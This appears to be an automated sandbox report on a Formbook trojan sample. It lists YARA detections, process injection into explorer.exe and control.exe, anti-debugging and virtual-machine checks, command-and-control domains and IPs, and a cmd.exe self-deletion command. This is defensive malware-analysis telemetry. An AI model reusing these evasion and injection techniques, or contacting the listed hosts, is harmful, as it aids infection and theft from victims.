          Source: 00000004.00000002.572645078.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.572645078.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.318721808.00000000012F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000002.318721808.00000000012F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.318721808.00000000012F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: afhjjq.exe PID: 4088, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: afhjjq.exe PID: 2236, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: control.exe PID: 4980, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: C:\Users\user\Desktop\YSpCB8DEek.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640
          Source: C:\Users\user\Desktop\YSpCB8DEek.exeCode function: 0_2_00406D5F0_2_00406D5F
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 1_2_013224951_2_01322495
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 1_2_02B131E71_2_02B131E7
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 1_2_02B133561_2_02B13356
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 2_2_004010302_2_00401030
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 2_2_0041E0922_2_0041E092
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 2_2_0041E2A82_2_0041E2A8
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 2_2_0041E3542_2_0041E354
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 2_2_0041EB092_2_0041EB09
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 2_2_0041DBE22_2_0041DBE2
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 2_2_0041D5632_2_0041D563
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 2_2_0041D5662_2_0041D566
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 2_2_00402D882_2_00402D88
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 2_2_00402D902_2_00402D90
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 2_2_00409E4B2_2_00409E4B
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 2_2_00409E502_2_00409E50
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 2_2_0041E7E02_2_0041E7E0
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 2_2_00402FB02_2_00402FB0
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 2_2_013224952_2_01322495
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: String function: 01322A5C appears 70 times
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: String function: 01321E8A appears 44 times
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 2_2_0041A320 NtCreateFile,2_2_0041A320
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 2_2_0041A3D0 NtReadFile,2_2_0041A3D0
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 2_2_0041A450 NtClose,2_2_0041A450
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 2_2_0041A500 NtAllocateVirtualMemory,2_2_0041A500
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 2_2_0041A31A NtCreateFile,2_2_0041A31A
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 2_2_0041A4FA NtAllocateVirtualMemory,2_2_0041A4FA
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\afhjjq.exe C9050FBAD700FC0418AAAB01231CF06AC3505F581846C075774E1D3EA5967F49
          Source: YSpCB8DEek.exeReversingLabs: Detection: 48%
          Source: C:\Users\user\Desktop\YSpCB8DEek.exeFile read: C:\Users\user\Desktop\YSpCB8DEek.exe
          Source: YSpCB8DEek.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\YSpCB8DEek.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\YSpCB8DEek.exe C:\Users\user\Desktop\YSpCB8DEek.exe
          Source: C:\Users\user\Desktop\YSpCB8DEek.exeProcess created: C:\Users\user\AppData\Local\Temp\afhjjq.exe "C:\Users\user\AppData\Local\Temp\afhjjq.exe" C:\Users\user\AppData\Local\Temp\areuvasydgv.tlq
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeProcess created: C:\Users\user\AppData\Local\Temp\afhjjq.exe C:\Users\user\AppData\Local\Temp\afhjjq.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\afhjjq.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\YSpCB8DEek.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
          Source: C:\Users\user\Desktop\YSpCB8DEek.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640
          Source: C:\Users\user\Desktop\YSpCB8DEek.exeFile created: C:\Users\user\AppData\Local\Temp\nstD265.tmp
          Source: classification engineClassification label: mal100.troj.evad.winEXE@10/5@4/3
          Source: C:\Users\user\Desktop\YSpCB8DEek.exeCode function: 0_2_004021AA CoCreateInstance,0_2_004021AA
          Source: C:\Users\user\Desktop\YSpCB8DEek.exeFile read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\YSpCB8DEek.exeCode function: 0_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404AB5
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1352:120:WilError_01
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCommand line argument: 2480580401341_2_01321210
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCommand line argument: 2480580401342_2_01321210
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: YSpCB8DEek.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: wntdll.pdbUGP source: afhjjq.exe, 00000001.00000003.310805407.000000001AB80000.00000004.00001000.00020000.00000000.sdmp, afhjjq.exe, 00000001.00000003.316889004.000000001A9F0000.00000004.00001000.00020000.00000000.sdmp, afhjjq.exe, 00000001.00000003.312416658.000000001A9F0000.00000004.00001000.00020000.00000000.sdmp, afhjjq.exe, 00000002.00000002.359908889.0000000001340000.00000040.00001000.00020000.00000000.sdmp, afhjjq.exe, 00000002.00000003.317205093.0000000000FD4000.00000004.00000020.00020000.00000000.sdmp, afhjjq.exe, 00000002.00000003.318811835.000000000117B000.00000004.00000020.00020000.00000000.sdmp, afhjjq.exe, 00000002.00000002.359908889.000000000145F000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000002.573963572.0000000004680000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000003.361687186.00000000044E8000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000004.00000002.573963572.000000000479F000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000003.359586736.0000000004347000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: control.pdb source: afhjjq.exe, 00000002.00000002.359776500.00000000012F0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: afhjjq.exe, 00000001.00000003.310805407.000000001AB80000.00000004.00001000.00020000.00000000.sdmp, afhjjq.exe, 00000001.00000003.316889004.000000001A9F0000.00000004.00001000.00020000.00000000.sdmp, afhjjq.exe, 00000001.00000003.312416658.000000001A9F0000.00000004.00001000.00020000.00000000.sdmp, afhjjq.exe, 00000002.00000002.359908889.0000000001340000.00000040.00001000.00020000.00000000.sdmp, afhjjq.exe, 00000002.00000003.317205093.0000000000FD4000.00000004.00000020.00020000.00000000.sdmp, afhjjq.exe, 00000002.00000003.318811835.000000000117B000.00000004.00000020.00020000.00000000.sdmp, afhjjq.exe, 00000002.00000002.359908889.000000000145F000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000002.573963572.0000000004680000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000003.361687186.00000000044E8000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000004.00000002.573963572.000000000479F000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000003.359586736.0000000004347000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: control.pdbUGP source: afhjjq.exe, 00000002.00000002.359776500.00000000012F0000.00000040.10000000.00040000.00000000.sdmp
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 1_2_01322AA1 push ecx; ret 1_2_01322AB4
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 1_2_02B147D0 push ebp; iretd 1_2_02B147D6
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 1_2_02B14919 pushfd ; iretd 1_2_02B1491A
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 1_2_02B14905 push edx; iretd 1_2_02B14910
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 2_2_0040E3B9 pushfd ; retf 2_2_0040E3BA
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 2_2_0041D475 push eax; ret 2_2_0041D4C8
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 2_2_00401408 push cs; ret 2_2_00401409
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 2_2_0041D4C2 push eax; ret 2_2_0041D4C8
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 2_2_0041D4CB push eax; ret 2_2_0041D532
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 2_2_0041D52C push eax; ret 2_2_0041D532
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 2_2_01322AA1 push ecx; ret 2_2_01322AB4
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 1_2_01326096 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,1_2_01326096
          Source: C:\Users\user\Desktop\YSpCB8DEek.exeFile created: C:\Users\user\AppData\Local\Temp\afhjjq.exe

          Hooking and other Techniques for Hiding and Protection

          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x89 0x9E 0xE7
          Source: C:\Users\user\Desktop\YSpCB8DEek.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_1-7844
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeRDTSC instruction interceptor: First address: 0000000000409B6E second address: 0000000000409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exeRDTSC instruction interceptor: First address: 0000000000359904 second address: 000000000035990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exeRDTSC instruction interceptor: First address: 0000000000359B6E second address: 0000000000359B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exe TID: 6008Thread sleep time: -42000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\control.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_1-5965
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 2_2_00409AA0 rdtsc 2_2_00409AA0
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 867
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 871
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeAPI coverage: 4.1 %
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 1_2_02B1310A GetSystemInfo,1_2_02B1310A
          Source: C:\Users\user\Desktop\YSpCB8DEek.exeCode function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D74
          Source: C:\Users\user\Desktop\YSpCB8DEek.exeCode function: 0_2_0040699E FindFirstFileW,FindClose,0_2_0040699E
          Source: C:\Users\user\Desktop\YSpCB8DEek.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
          Source: C:\Users\user\Desktop\YSpCB8DEek.exeAPI call chain: ExitProcess graph end nodegraph_0-3480
          Source: explorer.exe, 00000003.00000002.582579454.0000000008645000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000003.00000003.536500707.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i
          Source: explorer.exe, 00000003.00000003.536500707.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.323556878.00000000043B0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000003.533444927.000000000EFBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.533210056.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.587402417.000000000EFC1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.533514048.000000000EFC5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.536280386.000000000EFC7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.533339363.000000000F0B6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000003.00000003.536500707.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000003.00000002.582579454.0000000008645000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000003.00000000.330681413.00000000087F4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exe Code function: 1_2_01325B55 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_01325B55
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exe Code function: 1_2_01326096 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,1_2_01326096
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exe Code function: 1_2_0132984C CreateFileA,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,1_2_0132984C
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exe Code function: 2_2_00409AA0 rdtsc 2_2_00409AA0
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exe Process token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exe Code function: 1_2_02B12AAB mov eax, dword ptr fs:[00000030h] 1_2_02B12AAB
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exe Code function: 1_2_02B12A39 mov eax, dword ptr fs:[00000030h] 1_2_02B12A39
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exe Code function: 1_2_02B12A6E mov eax, dword ptr fs:[00000030h] 1_2_02B12A6E
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exe Code function: 1_2_02B1298F mov eax, dword ptr fs:[00000030h] 1_2_02B1298F
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\control.exe Process queried: DebugPort
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exe Code function: 2_2_0040ACE0 LdrLoadDll,2_2_0040ACE0
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exe Code function: 1_2_01324954 SetUnhandledExceptionFilter,1_2_01324954
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exe Code function: 1_2_01325B55 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_01325B55
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exe Code function: 1_2_01329622 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_01329622
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exe Code function: 1_2_01323819 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_01323819
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exe Code function: 2_2_01324954 SetUnhandledExceptionFilter,2_2_01324954
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exe Code function: 2_2_01323819 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_01323819
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exe Code function: 2_2_01325B55 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_01325B55
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exe Code function: 2_2_01329622 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_01329622

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\explorer.exe Domain query: www.swegon.tech
          Source: C:\Windows\explorer.exe Network Connect: 170.33.13.246 80
          Source: C:\Windows\explorer.exe Domain query: www.linnus.shop
          Source: C:\Windows\explorer.exe Domain query: www.incentiveexcellence.com
          Source: C:\Windows\explorer.exe Network Connect: 2.57.90.16 80
          Source: C:\Windows\explorer.exe Network Connect: 66.113.136.229 80
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exe Section unmapped: C:\Windows\SysWOW64\control.exe base address: B80000
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exe Section loaded: unknown target: C:\Users\user\AppData\Local\Temp\afhjjq.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exe Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exe Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exe Thread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exe Thread register set: target process: 3324
          Source: C:\Windows\SysWOW64\control.exe Thread register set: target process: 3324
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exe Process created: C:\Users\user\AppData\Local\Temp\afhjjq.exe C:\Users\user\AppData\Local\Temp\afhjjq.exe
          Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\afhjjq.exe"
          Source: explorer.exe, 00000003.00000003.547607432.00000000086B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.327323422.0000000005910000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.322257277.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000000.322257277.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.573906384.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: uProgram Manager*r
          Source: explorer.exe, 00000003.00000000.322257277.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.573906384.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
          Source: explorer.exe, 00000003.00000000.322257277.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.573906384.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
          Source: explorer.exe, 00000003.00000000.321913311.0000000000878000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.572601902.0000000000878000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ProgmanLoc*U
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exe Code function: GetLocaleInfoA,1_2_0132ADAD
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exe Code function: GetLocaleInfoA,2_2_0132ADAD
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exe Code function: 1_2_01325578 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,1_2_01325578
          Source: C:\Users\user\Desktop\YSpCB8DEek.exe Code function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640
